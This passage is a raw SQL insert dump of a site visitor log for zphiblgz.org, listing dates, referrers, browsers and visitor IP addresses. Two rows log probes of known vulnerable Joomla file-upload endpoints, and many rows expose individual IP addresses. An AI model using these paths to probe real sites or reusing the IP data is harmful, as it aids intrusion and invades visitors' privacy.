','Windows','7.0','','208.80.194.31','000',1,0),(29523,'2018-04-26','https://zphiblgz.org/','Firefox','Windows','34.0','','62.122.92.7','000',2,0),(29524,'2018-04-26','https://www.google.com/','Edge','Windows','16.16299','','96.244.50.179','000',3,0),(29525,'2018-04-26','https://zphiblgz.org','Chrome','Windows','23.0.1271.6','','31.184.192.185','000',4,0),(29526,'2018-04-26','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.27','000',1,0),(29527,'2018-04-26','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.30','000',1,0),(29528,'2018-04-26','https://zphiblgz.org/','Firefox','Windows','37.0','','62.122.92.7','000',2,0),(29529,'2018-04-26','https://zphiblgz.org/ts_teams/quiyatta-gardner/','AppleWebKit','Windows','534','','40.77.188.146','000',1,0),(29530,'2018-04-26','https://store-rx.com/blog/fr/','Opera','Windows','8.00','','46.118.114.175','000',1,0),(29531,'2018-04-26','https://www.google.com/','Chrome','Windows','65.0.3325.181','','96.244.131.88','000',1,0),(29532,'2018-04-26','https://www.facebook.com/','Firefox','Macintosh','59.0','','174.230.31.255','000',3,0),(29533,'2018-04-26','https://www.google.com/','Chrome','Windows','66.0.3359.117','','168.26.206.45','000',1,0),(29534,'2018-04-26','https://bird1.ru/','MSIE','Windows','6.0','','46.118.114.175','000',1,0),(29535,'2018-04-26','https://zphiblgz.org','Firefox','Windows','40.1','','182.187.20.164','000',2,0),(29536,'2018-04-26','https://zphiblgz.org','MSIE','Windows','7.0','','34.209.182.200','000',3,0),(29537,'2018-04-27','https://zphiblgz.org/','Firefox','Windows','30.1','','31.130.20.61','000',2,0),(29538,'2018-04-27','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(29539,'2018-04-27','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.131','000',1,0),(29540,'2018-04-27','https://zphiblgz.org','Chrome','Macintosh','28.0.1500.71','','72.14.199.140','000',1,0),(29541,'2018-04-27','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.156','000',1,0),(29542,'2018-04-27','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.184','000',1,0),(29543,'2018-04-27','https://professionalsolutions.eu/ru/','MSIE','Windows','6.0','','46.118.114.175','000',3,0),(29544,'2018-04-27','https://zphiblgz.org','Firefox','Windows','40.0','','188.138.105.83','000',2,0),(29545,'2018-04-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1770.f5iSXsy6UOuISNlNv_1iUMTaKkdgVlDsgSTJZcmi-T8.209fd1b028a9dac39dc030c12571057c75d71164&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040djBFU0Vnc1dsVVlCbnc2WUgwS3l3a1RMTHo2QXZveWtnMFN3d21LTHp5USws&sign=3ee7627357ccfc8f5f2b53171dc89df2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.127.61','000',2,0),(29546,'2018-04-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1770.HiVy6lSYLzeM2npVmoiXiZnIDOrKJ2hmTDOndFthXl8.04c85d7513c223ca08721dfd80b1ce3564290dbb&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ZGEyNi15ejlVajRfdVdkM2pkbVhaY2xLWmJJdml2ZHI0dWFVcE5LWkxSdyws&sign=330eca035e70fc63e48b2253f666f5c2&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.35.20','000',2,0),(29547,'2018-04-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1770.j2tuAc2_EJLZUmgO2lY7_n008L5nhxnXSOzqxpEhuis.cdfeee77528a6bfc6d49132c13af8d9bb212d8a8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041bVlSS1hfUm16czZWZFdRT2xoc2tNVllwY09mYU9rR1VXUUV3QkM4ODg2dyws&sign=997cc03ca03784871e84cca2475bdea8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.52.200.65','000',2,0),(29548,'2018-04-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1770.efH9Sf3pt1msHYJIY1__P6NG7NcdqhIfyrsFz8kbb08.03297c4f4cec0c4135a7f80c977ac3ea11a1b59b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041Q3AzOFByMWU5eDIxSXE4MU1RWUw1c3o3WmVaODBYdzZnZFpSSk5CTWlMdyws&sign=269104624f991aa420dc00d9a8964c4d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','198.199.116.213','000',2,0),(29549,'2018-04-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1770.ck93aQr2_D7bnrVyAl27ZI2Uf0DfwUy79aEh3TMrtUc.e2e8646d5293ee391543ed02d5c5040fa73cae33&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042WW5xMHdQeFhwVDlIaFdXbHc5ZThIcmJLbmxQbDZlSFM2VC03R2NucEd3QSws&sign=061277564916644335a6455f4a10eff5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.81','000',2,0),(29550,'2018-04-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1770.FCqnEyVyKZCA8b2gJNfij9V2CtwU7-EjZgcZQhjcuOs.7ad5863193cbbfdbef521eb97981a2abdff06239&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042N1JhenY0Vl9iamxFeDh5OFRGWHZsUEJkM0RfRlUtTXdVRVp3b2Z2VENpdyws&sign=28f2f87656340132e9f23a4b9b704735&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','45.76.185.120','000',2,0),(29551,'2018-04-27','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1770.bbNxlB2_IMqN-XzJBFHDlOTZqa9xwSzKk6ATIReCCIk.ce526e1eff5c7748d53e26ee18944a170ed91970&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040SjBURkc1T1hyU25mOEJMX2FxbHVKbjNmekJDUGVvT0pYU2NUS3NFWEhEdyws&sign=1b727ead524f3020b71cfda6649b9c6b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.33.120','000',2,0),(29552,'2018-04-27','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(29553,'2018-04-27','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.224.103','000',2,0),(29554,'2018-04-27','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.3.124','000',19,0),(29555,'2018-04-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.3.124','000',1,0),(29556,'2018-04-27','https://docs4all.com/','MSIE','Windows','6.0','','37.115.185.9','000',1,0),(29557,'2018-04-27','https://www.google.com/','Chrome','Windows','66.0.3359.139','','50.225.39.81','000',3,0),(29558,'2018-04-27','https://univerfiles.com/','Opera','Windows','9.01','','37.115.185.9','000',2,0),(29559,'2018-04-27','https://www.google.com/','Chrome','Windows','66.0.3359.139','','64.239.200.168','000',2,0),(29560,'2018-04-27','https://www.google.com/','Chrome','Windows','66.0.3359.117','','107.181.102.2','000',3,0),(29561,'2018-04-27','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.65.92','000',3,0),(29562,'2018-04-27','https://zphiblgz.org','Chrome','Windows','24.0.1290.1','','31.184.192.185','000',2,0),(29563,'2018-04-27','http://zphiblgz.org/','Chrome','Macintosh','57.4.9333.5605','','185.45.13.153','000',2,0),(29564,'2018-04-27','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.51.197.174','000',5,0),(29565,'2018-04-27','https://www.google.com/','Chrome','Macintosh','65.0.3325.181','','50.225.39.75','000',2,0),(29566,'2018-04-27','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(29567,'2018-04-27','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(29568,'2018-04-27','https://zphiblgz.org/','Firefox','Windows','32.1','','31.130.20.61','000',2,0),(29569,'2018-04-27','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','31.130.20.61','000',2,0),(29570,'2018-04-27','https://zphiblgz.org/','Firefox','Windows','33.0','','31.130.20.61','000',2,0),(29571,'2018-04-27','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(29572,'2018-04-27','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.25.241','000',1,0),(29573,'2018-04-27','http://sorus.ucoz.ru/','MSIE','Windows','6.0','','46.119.118.96','000',2,0),(29574,'2018-04-27','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','37.115.191.70','000',1,0),(29575,'2018-04-27','https://zphiblgz.org/','Firefox','Windows','34.1','','31.130.20.61','000',2,0),(29576,'2018-04-27','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(29577,'2018-04-27','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(29578,'2018-04-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(29579,'2018-04-27','http://www.zphiblgz.org/','Chrome','Windows','23.0.1271.97','','118.193.139.74','000',2,0),(29580,'2018-04-27','android-app://com.google.android.googlequicksearchbox/https/www.google.com','Chrome','Android','66.0.3359.126','','96.244.213.109','000',1,0),(29581,'2018-04-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(29582,'2018-04-27','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(29583,'2018-04-27','https://www.atyks.ru/','MSIE','Windows','6.0','','178.137.165.61','000',4,0),(29584,'2018-04-27','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.28','000',1,0),(29585,'2018-04-27','https://zphiblgz.org/','Firefox','Windows','37.0','','77.120.125.23','000',2,0),(29586,'2018-04-27','https://zphiblgz.org','Chrome','Windows','57.0.2987.98','','46.229.170.197','000',1,0),(29587,'2018-04-27','https://zphiblgz.org','Chrome','Chrome OS','65.0.3325.209','','69.140.242.93','000',5,0),(29588,'2018-04-27','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.27','000',1,0),(29589,'2018-04-27','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.27','000',1,0),(29590,'2018-04-27','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','173.73.38.46','000',3,0),(29591,'2018-04-27','https://zphiblgz.org','Firefox','Macintosh','39.0','','104.144.155.167','000',2,0),(29592,'2018-04-27','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(29593,'2018-04-27','http://komputers-best.ru/','Opera','Windows','8.01','','46.119.118.96','000',1,0),(29594,'2018-04-27','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(29595,'2018-04-27','http://zphiblgz.org/','Chrome','Windows','32.0.1700.102','','195.22.125.74','000',3,0),(29596,'2018-04-27','http://zphiblgz.org/components/com_sexycontactform/fileupload/index.php','Chrome','Windows','42.0.2311.152','','193.201.224.228','000',2,0),(29597,'2018-04-27','https://zphiblgz.org','Firefox','Windows','40.1','','45.224.81.244','000',2,0),(29598,'2018-04-28','https://allergick.com/','MSIE','Windows','6.0','','37.115.185.9','000',1,0),(29599,'2018-04-28','https://ek-invest.ru/','MSIE','Windows','6.0','','178.137.165.61','000',7,0),(29600,'2018-04-28','https://zphiblgz.org','Chrome','Linux','13.0.782.215','','217.147.168.40','000',2,0),(29601,'2018-04-28','https://zphiblgz.org','Chrome','Windows','17.0.963.66','','217.147.168.40','000',1,0),(29602,'2018-04-28','https://zphiblgz.org','Chrome','Linux','13.0.782.41','','217.147.168.40','000',1,0),(29603,'2018-04-28','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','23.236.240.122','000',2,0),(29604,'2018-04-28','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','198.143.155.138','000',1,0),(29605,'2018-04-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.195.53.238','000',4,0),(29606,'2018-04-28','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(29607,'2018-04-28','https://zphiblgz.org','Firefox','Windows','40.1','','41.251.196.29','000',2,0),(29608,'2018-04-28','http://www.alinabaniecka.pl/en/what-do-i-offer/','MSIE','Windows','2.0','','46.118.114.175','000',2,0),(29609,'2018-04-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1771.mZbz1HGf0w-Po06wVVa-eONZDmLraLI60GiUnKtHuW0.2aaa01681f7b049ca4403944df4c27844b7f5822&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041aGRvR3pKaURyNEdwbUdBQ3dCS0E0TDNkdFR5WmYxcmFQVlVLTjh3T210USws&sign=8e8897c21d245d216dc91710831f1eb3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.35.20','000',2,0),(29610,'2018-04-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1771.3JAnTyUs46hS1Us_fFHK6uKCbXx_7BU_8HPsfwhXln8.c7bb4c0bc88ca0f8fd571aa13e3598ce16b53fdd&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040SU44eEZnWUJaQ2R3Rlc1X3FJSk9FOElacElHVFlSUGV4ZFBRb1BhN1hPUSws&sign=6d1b9b65892ade75d20ba8eeff00e9db&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.145.40','000',2,0),(29611,'2018-04-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1771.awXICm5ZaCPJtkp0GkWUjhrxJrlJHj56bj8rvoNg34I.2facaac158b1ce3870835ff9ee1de9d23bc3e4c8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042NURyU3ZRNm4wRlczM2hyZVhiWThiSnlwN0NVcW5SNHlYQzEtQ29HZXBrUSws&sign=9e31b7701e08d722256d2df0ab43f0a7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.86.185','000',2,0),(29612,'2018-04-28','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.54','000',1,0),(29613,'2018-04-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1771.dPl5GHwejLmqpplfmiBLzy4HjqDtZc5JsPhENkIUL00.68d00ea0ca9f466edf224fdbdff85214cb3e0168&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042dXdrejBVakoybzYxTGpJQ1RYaFYydy1mcnBrc0pUMk44STQ4dTc4VWFoZyws&sign=b3e23120ec5e5e69fdce8b422777cca9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.45.13','000',2,0),(29614,'2018-04-28','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1771._WT5Ay-nWO92YmtBN4zxIxNwKPHVZpc1V5jE5Fcj6V8.21cf7fa0e081c8be881475a46723ddff9f7ecd57&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043cUtYYng5WDZCa1VLeU0wZ1BqdWtqZVZBWXZYdnJDaWlWYUZqXy1JV2xNQSws&sign=a8a5ead154aac02d7d673400cb965955&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.212.140','000',2,0),(29615,'2018-04-28','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','45.76.129.35','000',2,0),(29616,'2018-04-28','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(29617,'2018-04-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(29618,'2018-04-28','http://elvel.com.ua/','MSIE','Windows','6.0','','46.118.114.175','000',1,0),(29619,'2018-04-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(29620,'2018-04-28','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.35','000',1,0),(29621,'2018-04-28','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(29622,'2018-04-28','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','31.130.20.61','000',2,0),(29623,'2018-04-28','https://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','31.130.20.61','000',2,0),(29624,'2018-04-28','https://zphiblgz.org','Safari','Macintosh','11.1','','71.179.81.192','000',3,0),(29625,'2018-04-28','https://zphiblgz.org','Firefox','Windows','40.1','','39.33.175.248','000',2,0),(29626,'2018-04-28','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(29627,'2018-04-28','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(29628,'2018-04-28','https://zphiblgz.org','Firefox','Windows','40.1','','61.92.75.54','000',2,0),(29629,'2018-04-28','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.29','000',1,0),(29630,'2018-04-28','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(29631,'2018-04-28','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(29632,'2018-04-28','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.27','000',1,0),(29633,'2018-04-28','https://zphiblgz.org','Firefox','Windows','54.0','','95.211.188.3','000',1,0),(29634,'2018-04-28','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','184.154.47.3','000',1,0),(29635,'2018-04-28','https://www.zphiblgz.org:443/','Chrome','Windows','66.0.3359.117','','184.154.47.2','000',1,0),(29636,'2018-04-28','https://zphiblgz.org/','Firefox','Windows','33.1','','31.130.20.61','000',2,0),(29637,'2018-04-28','https://zphiblgz.org/','Firefox','Windows','42.0','','77.120.125.23','000',2,0),(29638,'2018-04-28','http://v-dobry-master.ru','Firefox','Windows','57.0','','188.165.4.128','000',1,0),(29639,'2018-04-28','http://v-dobry-master.ru','Chrome','Windows','61.0.3163.100','','188.165.4.128','000',1,0),(29640,'2018-04-28','http://v-dobry-master.ru','Firefox','Windows','30.0','','188.165.4.128','000',1,0),(29641,'2018-04-28','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',2,0),(29642,'2018-04-29','http://zphiblgz.org/download/constitution-by-laws/','Firefox','Windows','40.1','','218.76.33.134','000',2,0),(29643,'2018-04-29','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.236.227.169','000',2,0),(29644,'2018-04-29','https://zphiblgz.org','Safari','iPhone','11.0','','108.15.43.53','000',3,0),(29645,'2018-04-29','https://docs4all.com/','MSIE','Windows','4.01','','37.115.185.9','000',1,0),(29646,'2018-04-29','http://www.zphiblgz.org/administrator/components/com_simplephotogallery/lib/uploadFile.php','Chrome','Windows','42.0.2311.152','','209.90.225.242','000',1,0),(29647,'2018-04-29','https://univerfiles.com/','MSIE','Windows','6.0','','37.115.185.9','000',2,0),(29648,'2018-04-29','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',2,0),(29649,'2018-04-29','https://www.google.com/','Safari','iPhone','10.0','','174.210.2.65','000',1,0),(29650,'2018-04-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1772.Dmvq_z9FDJUgXYW5YGeRXQvPiHUEFeN-qTWrckL8hQg.8b1d48eaacf0504850bf3c6b609b5bc9a09dc243&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041NkpFRWxkZmdPMFQ5c0tWMWllbzN5OFVXb0s4Rl9KQi0ydDNpbUJnaklaQSws&sign=f7e39eeafaee781e90925f0ef6ad877d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','146.185.183.235','000',2,0),(29651,'2018-04-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1772.HkUtb-CyCwk4kWSIqOBskrDEfhO8x-VZKmgum9iF76Y.e14b83d46373b19ffc40bd5eda82154377f180e1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042X1NPNnpzYWdfUkFrcTdWamZlZE5sN0k3WWdyQVdjMkxYOEQydGo3ZG53USws&sign=45df0d52b3ccfbcae3c3770f4e763260&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.195.73','000',2,0),(29652,'2018-04-29','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','188.166.145.13','000',3,0),(29653,'2018-04-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1772.MZjPoA9OTJnaD3QngwwkeiQEOLFEfUXlqvp3YIJbCmc.4f10c23b179f613a1c38a74a20b9e51349eb8611&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040MjFBdGs2cEJwQ2NzM3J6a2tWeW8wNmdjekhCZXhrNm05NFZHSFRDaFNxQSws&sign=131c8ba64892ec9c31276cb44f88d7e9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.166.55','000',2,0),(29654,'2018-04-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1772._B_-93LwaIkcyUlo99tvT4_8DgKthG03FNo3SWPUgVo.00763f31825d8c2067f5ea9daf7cbb446829e4e6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043ZHFkRlFyam9GeWdiUTY2emE3R0tFekdQS1BwSGZkQllsV25ObGgwRlZ4USws&sign=fe8cc4d991d826508585aa04b03c31ba&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.125.48','000',2,0),(29655,'2018-04-29','https://docsarchive.net/','MSIE','Windows','5.5','','37.115.185.9','000',1,0),(29656,'2018-04-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1772.5ZpblFexPZ6l6TNO3j6CABc9oJzzFv8aVS6na80-4hg.80e4df15f8a5a4b34cdb3303f5bdd784498d4388&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Rlg1ZXdKTmxXeDZOTVRNUTBSXzZoQU5mWENCSk9haF9VSVRROUVaVTJlZyws&sign=84b27aa7299963fc2565b242303d6272&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.155.167','000',2,0),(29657,'2018-04-29','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1772.f0_OtnO-8u87o-IrQf0L0UjRdOrHFtfoPxBT5qGH_IM.c0e036d94196dfe0664b7b88d37c4b3ebd538eef&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041QWxnUUJYMTAtdjVTLVRLcE1uVUowYW02Wl85V0toNTlNeVdBd1hib3FLQSws&sign=470e8c8e6633c573199da5e95fb29750&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','149.56.128.37','000',2,0),(29658,'2018-04-29','https://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.77','000',1,0),(29659,'2018-04-29','https://zphiblgz.org/service/zen/','AppleWebKit','Windows','534','','199.30.24.154','000',1,0),(29660,'2018-04-29','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(29661,'2018-04-29','http://zahvat.ru/','MSIE','Windows','6.0','','46.119.118.96','000',1,0),(29662,'2018-04-29','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.178.137','000',1,0),(29663,'2018-04-29','https://zphiblgz.org','Firefox','Windows','40.1','','49.148.150.132','000',2,0),(29664,'2018-04-29','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.30','000',1,0),(29665,'2018-04-29','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(29666,'2018-04-29','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.30','000',1,0),(29667,'2018-04-29','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(29668,'2018-04-29','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(29669,'2018-04-29','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(29670,'2018-04-29','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(29671,'2018-04-29','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATPWX5hxEz5f81wLbF4IlBa3H0_0T1PIBqHS8UTa364GT8uG6Dl_hqTrgs09tJ15e4xEjtB2tVFAP1weebXbpiyLKG0IinBiLwSz_xXJ3slXV77ddwYII36STbVPCQ','Chrome','Windows','41.0.2228.0','','173.252.98.119','000',2